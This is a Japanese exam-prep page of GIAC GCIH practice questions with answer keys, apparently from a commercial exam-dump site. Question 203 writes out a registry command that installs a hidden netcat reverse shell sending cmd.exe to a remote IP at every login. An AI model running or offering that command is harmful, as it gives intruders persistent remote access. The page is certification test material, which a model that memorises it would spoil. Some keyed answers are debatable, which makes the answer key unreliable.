無料で使えるGCIHサンプル問題で100%カバー率のリアル試験問題（更新された335問あります) [Q201-Q217]

無料で使えるGCIHサンプル問題で100%カバー率のリアル試験問題（更新された335問あります)

今すぐダウンロード！リアルGIAC GCIH試験問題集テストエンジン試験問題

質問 # 201
Fill in the blank with the appropriate name of the tool.
______ scans for rootkits by comparing SHA-1 hashes of important files with known good ones in online database.

正解：

解説：
rkhunter

質問 # 202
Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provide services.
Which of the following are the techniques used for network mapping by large organizations?
Each correct answer represents a complete solution. Choose three.

• A. SNMP-based approaches
• B. Route analytics
• C. Active Probing
• D. Packet crafting

正解：A、B、C

解説：
Section: Volume A

質問 # 203
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

• A. You want to set the Netcat to execute command any time.
• B. You want to add the Netcat command to the Windows registry.
• C. You want to put Netcat in the stealth mode.
• D. You want to perform banner grabbing.

正解：A、B、C

質問 # 204
You discover that your network routers are being flooded with broadcast packets that have the return address of one of the servers on your network. This is resulting in an overwhelming amount of traffic going back to that server and flooding it. What is this called?

• A. Smurf attack
• B. Syn flood
• C. IP spoofing
• D. Blue jacking

正解：A

質問 # 205
You work as a Network Administrator in the SecureTech Inc. The SecureTech Inc. is using Linux-based server. Recently,
you have updated the password policy of the company in which the server will disable passwords after four trials.
What type of attack do you want to stop by enabling this policy?

• A. Replay
• B. Cookie poisoning
• C. Brute force
• D. XSS

正解：C

質問 # 206
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare- secure.com. He installs a rootkit on the Linux server of the We-are-secure network. Which of the following statements are true about rootkits?
Each correct answer represents a complete solution. Choose all that apply.

• A. They allow an attacker to set a Trojan in the operating system and thus open a backdoor for anytime access.
• B. They allow an attacker to run packet sniffers secretly to capture passwords.
• C. They allow an attacker to replace utility programs that can be used to detect the attacker's activity.
• D. They allow an attacker to conduct a buffer overflow.

正解：A、B、C

質問 # 207
Which of the following steps of incident response is steady in nature?

• A. Eradication
• B. Preparation
• C. Containment
• D. Recovery

正解：B

質問 # 208
Which of the following services CANNOT be performed by the nmap utility?
Each correct answer represents a complete solution. Choose all that apply.

• A. Active OS fingerprinting
• B. Sniffing
• C. Port scanning
• D. Passive OS fingerprinting

正解：B、D

質問 # 209
Which of the following Nmap commands is used to perform a UDP port scan?

• A. nmap -sY
• B. nmap -sS
• C. nmap -sU
• D. nmap -sN

正解：C

質問 # 210
You want to use PGP files for steganography. Which of the following tools will you use to accomplish the task?

• A. Blindside
• B. ImageHide
• C. Stealth
• D. Snow

正解：C

質問 # 211
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare-secure.com. He is working on the Linux operating system. He wants to sniff the we-are-secure network and intercept a conversation between two employees of the company through session hijacking. Which of the following tools will John use to accomplish the task?

• A. Hunt
• B. Ethercap
• C. Tripwire
• D. IPChains

正解：A

質問 # 212
When you conduct the XMAS scanning using Nmap, you find that most of the ports scanned do not give a response. What can be the state of these ports?

• A. Filtered
• B. Closed
• C. Open

正解：C

質問 # 213
John used to work as a Network Administrator for We-are-secure Inc. Now he has resigned from the company for
personal reasons. He wants to send out some secret information of the company. To do so, he takes an image file and
simply uses a tool image hide and embeds the secret file within an image file of the famous actress, Jennifer Lopez,
and sends it to his Yahoo mail id. Since he is using the image file to send the data, the mail server of his company is
unable to filter this mail. Which of the following techniques is he performing to accomplish his task?

• A. Email spoofing
• B. Steganography
• C. Web ripping
• D. Social engineering

正解：B

質問 # 214
Which of the following statements are correct about spoofing and session hijacking?
Each correct answer represents a complete solution. Choose all that apply.

• A. Spoofing is an attack in which an attacker can spoof the IP address or other identity of the target and the valid user cannot be active.
• B. Spoofing is an attack in which an attacker can spoof the IP address or other identity of the target but the valid user can be active.
• C. Session hijacking is an attack in which an attacker takes over the session, and the valid user's session is disconnected.
• D. Session hijacking is an attack in which an attacker takes over the session, and the valid user's session is not disconnected.

正解：B、D

質問 # 215
Which of the following penetration testing phases involves reconnaissance or data gathering?

• A. Pre-attack phase
• B. Post-attack phase
• C. Attack phase
• D. Out-attack phase

正解：A

質問 # 216
Mark works as a Network Administrator for Perfect Inc. The company has both wired and wireless networks. An
attacker attempts to keep legitimate users from accessing services that they require. Mark uses IDS/IPS sensors on the
wired network to mitigate the attack. Which of the following attacks best describes the attacker's intentions?

• A. Reconnaissance attack
• B. DoS attack
• C. Internal attack
• D. Land attack

正解：B

質問 # 217
......

最新GCIHテスト問題集を試そう！更新されたGIAC試験が合格できます：https://www.goshiken.com/GIAC/GCIH-mondaishu.html

検証済み！GCIH問題集と解答でGCIHテストエンジン正確解答付き：https://drive.google.com/open?id=1hRZxXTUgG4CG9PCPZNE3TtjY0oQ1Z_dP